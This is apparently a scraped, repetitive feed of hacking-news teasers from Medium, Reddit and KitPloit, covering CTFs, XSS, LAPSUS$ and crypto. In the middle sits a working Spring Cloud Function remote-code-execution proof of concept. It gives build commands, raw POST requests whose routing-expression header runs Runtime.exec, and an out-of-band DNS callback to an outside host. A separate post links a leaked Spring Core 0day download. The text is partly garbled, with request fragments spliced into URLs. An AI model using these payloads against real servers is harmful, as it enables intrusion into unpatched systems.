Hacking on Medium
Cross-Site Scripting (XSS) via image rendering application
https://cdn-images-1.medium.com/max/1000/0*1PfYtVmITrK9faWg.png
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…
Continue reading on Medium »
Cross-Site Scripting (XSS) via image rendering application
https://cdn-images-1.medium.com/max/1000/0*1PfYtVmITrK9faWg.png
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…
Continue reading on Medium »
Medium
Cross-Site Scripting (XSS) via image rendering application
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…
Hacking on Medium
Joy VM Walkthrough
https://cdn-images-1.medium.com/max/1049/0*KLofwgajtminFAyG
Makineyi indirebilirsiniz.
Continue reading on Medium »
Joy VM Walkthrough
https://cdn-images-1.medium.com/max/1049/0*KLofwgajtminFAyG
Makineyi indirebilirsiniz.
Continue reading on Medium »
Medium
Joy VM Walkthrough
Makineyi indirebilirsiniz.
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
https://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
https://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") buildwget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jarhttps://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 get path lists for testfind . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'...
functionRouter
uppercase
lowercase
... https://blogger.googleusercontent.com/img/a/AVvXsEjtT9tOIFERen-o92zVmjjMGrU1VOsjB44JvIq42soyvpxuwfmuHffXKZAWoLyZ2KgTDa4o-3ynuNGcSpeyScgkULF0Zbwis8was14Oze1LIyUTsSUO0VGLLZmhILqpB8ryv5WQP8sh49lpZ-jjT2UsYUqAzwK5RQcW03bkmEPZMX84rElqKMVyPjOG=w640-h454 poc1Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15 Connection: close spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app") Content-Length: 5 51pwn">POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5
51pwn https://blogger.googleusercontent.com/img/a/AVvXsEj5NTmUaoLsPRLc1J6VS3Etx_6N4CPx0m99McBLfeTbKonpluWT9rXgrKeCtfLg5_ADWcEju6z03vTCDzUc2cu2QuhPeKM_J7MGnFm8w14LGY-sOkVIdOcPVvsL8ERnd_fSk8OEYsWXRx_tMu_x1EwvL7UbhUZ8hYJrya0j-PKJ_8H5psLQr8DZBFNy=w640-h322 poc2POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5
51pwn checkcurl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'Download Spring-Spel-0Day-Pochacking: security in practice
geo location
Is it possible to find an exact geo location without working with an (isp)
submitted by /u/kami-zx2
[link] [comments]
geo location
Is it possible to find an exact geo location without working with an (isp)
submitted by /u/kami-zx2
[link] [comments]
reddit
geo location
Is it possible to find an exact geo location without working with an (isp)
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.
* https://twitter.com/vxunderground/status/1509170582469943303
* https://github.com/craig/SpringCore0day
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.
We have not verified the exploit.
tl;dr big if true
Download the 0day POC here: https://share.vx-underground.org
submitted by /u/DrinkMoreCodeMore
[link] [comments]
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.
* https://twitter.com/vxunderground/status/1509170582469943303
* https://github.com/craig/SpringCore0day
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.
We have not verified the exploit.
tl;dr big if true
Download the 0day POC here: https://share.vx-underground.org
submitted by /u/DrinkMoreCodeMore
[link] [comments]
Shifting Resume for PenTesting Career
https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/
Hey All! I am currently in the InfoSec industry working as an IS Analyst and am looking to pivot into the pentesting industry here in the coming months. I was curious if you guys knew of some good resources, templates, etc. to groom my resume to be best geared towards being hired as a pentester. I think with all the learning material (HackTheBox, TryHackMe, Bug Bounties, etc), it makes it a unique situation on how to structure my resume. Any recommendations, resources, advice is greatly appreciated! Thanks guys! submitted by /u/kevinj895 (https://www.reddit.com/user/kevinj895)
[link] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/) [comments] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/
Hey All! I am currently in the InfoSec industry working as an IS Analyst and am looking to pivot into the pentesting industry here in the coming months. I was curious if you guys knew of some good resources, templates, etc. to groom my resume to be best geared towards being hired as a pentester. I think with all the learning material (HackTheBox, TryHackMe, Bug Bounties, etc), it makes it a unique situation on how to structure my resume. Any recommendations, resources, advice is greatly appreciated! Thanks guys! submitted by /u/kevinj895 (https://www.reddit.com/user/kevinj895)
[link] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/) [comments] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Shifting Resume for PenTesting Career
Hey All! I am currently in the InfoSec industry working as an IS Analyst and am looking to pivot into the pentesting industry here in the coming...
Ambassador World Cup 2022 CTF
https://medium.com/@damaidec/ambassador-world-cup-2022-ctf-8ea0955114c9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@damaidec/ambassador-world-cup-2022-ctf-8ea0955114c9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ambassador World Cup 2022 CTF
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites. The competition…
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.Continue reading on Medium » (https://medium.com/@damaidec/ambassador-world-cup-2022-ctf-8ea0955114c9?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ambassador World Cup 2022 CTF
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites. The competition…
Ambassador World Cup 2022 CTF
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.Continue reading on Medium »
Read more...
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.Continue reading on Medium »
Read more...
Enter the Crow Games for the opportunity to earn NFTs!
Complete some tasks, tell us about it, and join the Crow Clan! After our recent airdrop of the crow clan NFT we have decided to grow the…Continue reading on Medium »
Read more...
Complete some tasks, tell us about it, and join the Crow Clan! After our recent airdrop of the crow clan NFT we have decided to grow the…Continue reading on Medium »
Read more...
Hacking on Medium
The LAPSUS$ hack group is back again, and Facebook is a new victim
LAPSUS$
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
The LAPSUS$ hack group is back again, and Facebook is a new victim
LAPSUS$
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The LAPSUS$ hack group is back again, and Facebook is a new victim
LAPSUS$
Hacking on Medium
CyCraft Announces Results From Latest ATT&CKⓇ Evaluations
https://cdn-images-1.medium.com/max/2400/1*slE7vhTamA_gT_ztIY97mQ.jpeg
CyCraft MDR Tested Against MITRE Engenuity-Emulated Threat Group Simulations, Latest Round Includes WizardSpider and Sandworm
Continue reading on CyCraft »
___________________________
@hacking_Attack
@Hacking_Video
CyCraft Announces Results From Latest ATT&CKⓇ Evaluations
https://cdn-images-1.medium.com/max/2400/1*slE7vhTamA_gT_ztIY97mQ.jpeg
CyCraft MDR Tested Against MITRE Engenuity-Emulated Threat Group Simulations, Latest Round Includes WizardSpider and Sandworm
Continue reading on CyCraft »
___________________________
@hacking_Attack
@Hacking_Video
Medium
CyCraft Announces Results From Latest ATT&CKⓇ Evaluations
CyCraft MDR Tested Against MITRE Engenuity-Emulated Threat Group Simulations, Latest Round Includes WizardSpider and Sandworm
Hacking on Medium
Ambassador World Cup 2022 CTF
https://cdn-images-1.medium.com/max/796/1*VFI4ovr8zu3kmDeAg5jpyg.png
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Ambassador World Cup 2022 CTF
https://cdn-images-1.medium.com/max/796/1*VFI4ovr8zu3kmDeAg5jpyg.png
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ambassador World Cup 2022 CTF
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites. The competition…
Hacking on Medium
All Been Crypto — Week 1 April 2022
https://cdn-images-1.medium.com/max/1920/1*Kd6MhOXRlD91Gd_q6n5Blg.jpeg
We are closing the week relatively unchanged at 2,2tn market cap. Had a major rally earlier and gave away a lot of the gains yesterday…
Continue reading on Coinmonks »
___________________________
@hacking_Attack
@Hacking_Video
All Been Crypto — Week 1 April 2022
https://cdn-images-1.medium.com/max/1920/1*Kd6MhOXRlD91Gd_q6n5Blg.jpeg
We are closing the week relatively unchanged at 2,2tn market cap. Had a major rally earlier and gave away a lot of the gains yesterday…
Continue reading on Coinmonks »
___________________________
@hacking_Attack
@Hacking_Video
Medium
All Been Crypto — Week 1 April 2022
We are closing the week relatively unchanged at 2,2tn market cap. Had a major rally earlier and gave away a lot of the gains yesterday…